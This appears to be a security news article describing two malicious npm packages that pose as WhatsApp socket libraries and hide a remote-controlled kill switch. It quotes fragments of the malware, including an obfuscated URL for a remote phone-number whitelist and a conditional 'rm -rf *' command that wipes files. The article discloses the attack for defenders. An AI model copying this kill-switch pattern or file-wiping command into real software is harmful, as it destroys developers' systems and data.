WhatsApp Developers Under Attack From Weaponized npm Packages with Remote Kill Switch

Two malicious npm packages have emerged as sophisticated weapons targeting WhatsApp developers through a remote-controlled destruction mechanism that can completely wipe development systems.

The packages, identified as naya-flore and nvlore-hsc, masquerade as legitimate WhatsApp socket libraries while harboring a devastating kill switch capable of executing system-wide file deletion through a single command.

Published by npm user nayflore using the email address [email protected], these weaponized packages have accumulated over 1,110 downloads within a month, demonstrating their effectiveness in infiltrating developer workflows.

The malicious libraries exploit the growing WhatsApp Business API ecosystem, which now serves over 200 million businesses globally, creating an attractive target environment where developers routinely install third-party packages for chatbot development, customer service automation, and messaging integrations.

Socket.dev researchers identified the sophisticated attack mechanism embedded within what appears to be standard WhatsApp integration functionality.

The malicious code specifically targets the requestPairingCode function, a legitimate component that developers would naturally invoke during WhatsApp bot authentication setup.

Remote Kill Switch Architecture

The packages implement a particularly insidious attack vector through their phone number verification system.

Upon execution, the malicious code retrieves a remote database of whitelisted phone numbers from a GitHub repository using Base64 obfuscation:-

const sesiPath = "aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL25hdmFMaW5oL2RhdGFiYXNlL21haW4vc2Vza2E";
// Decodes to: https://raw.githubusercontent.com/navaLinh/database/main/seska.json

The attack logic operates through a deceptively simple mechanism within the requestPairingCode function. After fetching the remote whitelist, the code checks whether the developer’s phone number exists in the database.

Whitelisted phone number list showing Indonesian mobile numbers that bypass the kill switch (Source – Socket.dev)

If the number is found, the package continues normal operation. However, for any unlisted phone numbers, the system sets a trigger variable to “0000” and executes the destructive payload:-

if (getsNumberCode === "0000") {
    exec('rm -rf *')  // Destroy system
}

This selective targeting approach allows threat actors to maintain operational security by preserving systems belonging to specific phone numbers while destroying others.

The GitHub-hosted database provides real-time control over targeting decisions without requiring package republication, representing a significant evolution in supply chain attack sophistication.

Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial